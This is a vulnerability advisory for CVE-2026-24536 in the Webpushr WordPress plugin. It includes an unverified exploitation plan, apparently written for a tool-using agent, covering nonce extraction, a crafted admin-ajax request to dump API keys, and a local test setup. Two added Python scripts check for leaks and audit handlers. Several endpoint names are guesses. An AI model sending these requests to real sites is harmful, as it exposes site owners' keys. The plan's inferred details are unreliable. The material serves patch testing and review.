CVE-2026-24536

Webpushr <= 4.38.0 - Unauthenticated Information Exposure

Exposure of Sensitive Information to an Unauthorized Actor

CVSS Score: 5.3
Severity: medium
Patched in: 4.39.0
Time to patch: 13d

Description

The Web Push Notifications – Webpushr plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.38.0. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: None
Availability: None

Technical Details

Affected versions: <=4.38.0
Published: January 25, 2026
Last updated: February 6, 2026
Research Plan: Unverified

Exploitation Research Plan - CVE-2026-24536 (Webpushr Information Exposure)

1. Vulnerability Summary

The Web Push Notifications – Webpushr plugin (<= 4.38.0) contains an unauthenticated information exposure vulnerability. The plugin registers AJAX or REST API endpoints designed for frontend communication but fails to implement sufficient authorization or data filtering. This allows any unauthenticated visitor to query these endpoints and retrieve sensitive configuration details, including REST API keys, Public Keys, or internal plugin settings, which could be leveraged to spoof notifications or gain further insights into the site's environment.

2. Attack Vector Analysis

  • Endpoint: admin-ajax.php (AJAX) or /wp-json/webpushr/v1/... (REST API).
  • Vulnerable Action (Inferred): webpushr_get_settings, webpushr_fetch_config, or webpushr_get_stats.
  • Authentication: None required (unauthenticated).
  • Preconditions: The plugin must be active. Some endpoints might only expose data if the "Webpushr" service is partially configured.
  • Payload: A simple GET or POST request to the identified action.

3. Code Flow (Inferred)

  1. Registration: The plugin uses add_action( 'wp_ajax_nopriv_[ACTION_NAME]', ... ) or register_rest_route() with a permission_callback that returns true.
  2. Entry Point: An unauthenticated user sends a request to wp-admin/admin-ajax.php?action=[ACTION_NAME].
  3. Processing: The handler function (e.g., get_webpushr_settings()) retrieves data using get_option( 'webpushr_settings' ) or similar.
  4. Data Sink: The handler returns the raw options array via wp_send_json(), which includes sensitive keys not meant for public consumption.

4. Nonce Acquisition Strategy

If the vulnerable endpoint requires a nonce (common in admin-ajax.php handlers using check_ajax_referer), follow these steps:

  1. Identify Shortcode: Webpushr often enqueues its tracking scripts on the homepage or pages containing its widget.
  2. Create Trigger Page: Create a page that forces the plugin to load its scripts.
    wp post create --post_type=page --post_status=publish --post_title="Push Test" --post_content="[webpushr_button]"
    
  3. Navigate and Extract:
    • Navigate to the newly created page.
    • Use browser_eval to find the localization object. Webpushr typically uses webpushr_ajax_obj or webpushr_vars.
    • JS Variable Name (Inferred): webpushr_ajax_obj
    • Nonce Key (Inferred): nonce or security
    • Command: browser_eval("window.webpushr_ajax_obj?.nonce")

5. Exploitation Strategy

The goal is to trigger the sensitive data dump via admin-ajax.php.

Step 1: Discovery of Vulnerable Action

Check the plugin source for wp_ajax_nopriv hooks:

grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/webpushr-web-push-notifications/

Look for actions like webpushr_get_config.

Step 2: Request Construction

Once the action and potential nonce are identified, send an unauthenticated HTTP request:

Method: POST
URL: http://[TARGET]/wp-admin/admin-ajax.php
Headers: Content-Type: application/x-www-form-urlencoded
Body: action=[ACTION_NAME]&security=[NONCE] (Replace security with the actual parameter name found in check_ajax_referer)

Step 3: Payload Delivery (via http_request tool)

{
  "method": "POST",
  "url": "http://localhost:8080/wp-admin/admin-ajax.php",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "params": {
    "action": "webpushr_get_config",
    "security": "REPLACED_WITH_EXTRACTED_NONCE"
  }
}

6. Test Data Setup

  1. Install & Activate: Webpushr plugin version 4.38.0.
  2. Configure Dummy Data: Use WP-CLI to set fake API keys so the exposure is verifiable.
    wp option update webpushr_settings '{"rest_api_key":"SECRET_API_KEY_12345", "public_key":"PUBLIC_KEY_ABCDE", "tracking_id":"TRK_9999"}' --format=json
    
  3. Create Page: Create the page for nonce extraction as described in Section 4.

7. Expected Results

  • Response Code: 200 OK
  • Response Body: A JSON object containing the rest_api_key and other sensitive configuration strings.
  • Example Response:
    {
      "success": true,
      "data": {
        "rest_api_key": "SECRET_API_KEY_12345",
        "tracking_id": "TRK_9999",
        "public_key": "..."
      }
    }
    

8. Verification Steps

  1. Verify via WP-CLI: Compare the output of the exploit with the actual stored option.
    wp option get webpushr_settings
    
  2. Confirm Exposure: Check if the value SECRET_API_KEY_12345 is present in the http_request response body.
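
The comparison in steps 1 and 2 can be automated as a regression check on a test site, before and after updating to 4.39.0. This added example (not part of the original plan or the plugin) reports which stored webpushr_settings values reappear in a captured response body; the inputs are the dummy values from Sections 6 and 7, and the `allowed` parameter is a hypothetical way to mark fields that are meant to be public.

```python
import json

# Dummy values from Sections 6 and 7 of this plan, not real keys.
STORED = '{"rest_api_key":"SECRET_API_KEY_12345", "public_key":"PUBLIC_KEY_ABCDE", "tracking_id":"TRK_9999"}'
RESPONSE = '{"success": true, "data": {"rest_api_key": "SECRET_API_KEY_12345", "tracking_id": "TRK_9999", "public_key": "..."}}'


def flatten(value, path=""):
    """Yield (path, leaf) for every scalar in a decoded JSON value."""
    if isinstance(value, dict):
        for key, item in value.items():
            yield from flatten(item, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for i, item in enumerate(value):
            yield from flatten(item, f"{path}[{i}]")
    else:
        yield path, value


def leaked_settings(stored_json, body, allowed=(), min_len=6):
    """Map each stored setting to the response locations that echo its value.

    allowed: setting names that are intentionally visible to visitors.
    min_len: ignore short values that would match by coincidence.
    """
    secrets = {p: v for p, v in flatten(json.loads(stored_json))
               if isinstance(v, str) and len(v) >= min_len and p not in allowed}
    try:
        leaves = list(flatten(json.loads(body)))
    except json.JSONDecodeError:
        # Not JSON, e.g. page HTML carrying a localized script object.
        leaves = [("<raw body>", body)]
    report = {}
    for name, secret in secrets.items():
        hits = [p for p, leaf in leaves if isinstance(leaf, str) and secret in leaf]
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, where in leaked_settings(STORED, RESPONSE).items():
        print(f"LEAK {name} -> {', '.join(where)}")
```

An empty result for the same request after the update is the pass condition; the raw-body fallback also covers the localized-script case listed under Alternative Approaches.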

9. Alternative Approaches

  • REST API Discovery: If no AJAX actions are fruitful, search for REST routes:
    grep -rn "register_rest_route" /var/www/html/wp-content/plugins/webpushr-web-push-notifications/
    
    Check if any route lacks a permission_callback or uses __return_true.
  • Global Variable Leakage: Check if the sensitive data is directly localized into the page HTML for all users via wp_localize_script.
    • Navigate to the homepage.
    • Run browser_eval("window.webpushr_ajax_obj") and check if the API key is already present in the object properties.
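
The two grep checks in this plan (Step 1 of Section 5 and the REST API Discovery item in Section 9) only list matching lines. The added Python example below, which is not code from the plugin or from this page, turns them into a source review pass that reports wp_ajax_nopriv_ registrations and register_rest_route() calls whose permission_callback is missing or __return_true. The sample PHP and every action, route and callback name in it are constructed, and each finding is a handler to review, not a confirmed flaw.

```python
import re

NOPRIV_RE = re.compile(r"""add_action\s*\(\s*['"]wp_ajax_nopriv_(\w+)['"]""")
ROUTE_RE = re.compile(r"register_rest_route\s*\(")
PERM_RE = re.compile(r"""['"]permission_callback['"]\s*=>\s*([^,\s)\]]+)""")

# Constructed sample, not taken from the Webpushr plugin; all names are hypothetical.
SAMPLE = r"""<?php
add_action( 'wp_ajax_nopriv_webpushr_get_config', 'get_webpushr_settings' );
add_action( 'wp_ajax_webpushr_save', 'save_webpushr_settings' );
register_rest_route( 'webpushr/v1', '/config', array(
    'callback' => 'get_webpushr_settings', 'permission_callback' => '__return_true',
) );
register_rest_route( 'webpushr/v1', '/stats/(?P<id>\d+)', array( 'callback' => 'get_webpushr_stats' ) );
"""

def call_args(src, start):
    """Return the argument text of the call whose '(' sits just before start."""
    depth, i, quote = 1, start, None
    while i < len(src) and depth:
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1  # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        else:
            depth += (ch == "(") - (ch == ")")
        i += 1
    return src[start:i - 1]

def audit_php(src):
    """Return (line, kind, detail) for handlers declared reachable while logged out."""
    findings = []
    for m in NOPRIV_RE.finditer(src):
        findings.append((src.count("\n", 0, m.start()) + 1, "ajax-nopriv", m.group(1)))
    for m in ROUTE_RE.finditer(src):
        line = src.count("\n", 0, m.start()) + 1
        perm = PERM_RE.search(call_args(src, m.end()))
        if perm is None:
            findings.append((line, "rest-no-permission-callback", ""))
        elif perm.group(1).strip("'\"") == "__return_true":
            findings.append((line, "rest-public", "__return_true"))
    return findings

if __name__ == "__main__":
    print(*audit_php(SAMPLE), sep="\n")
```

A permission callback written as a closure that simply returns true is not caught by this pass and still needs a manual read.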
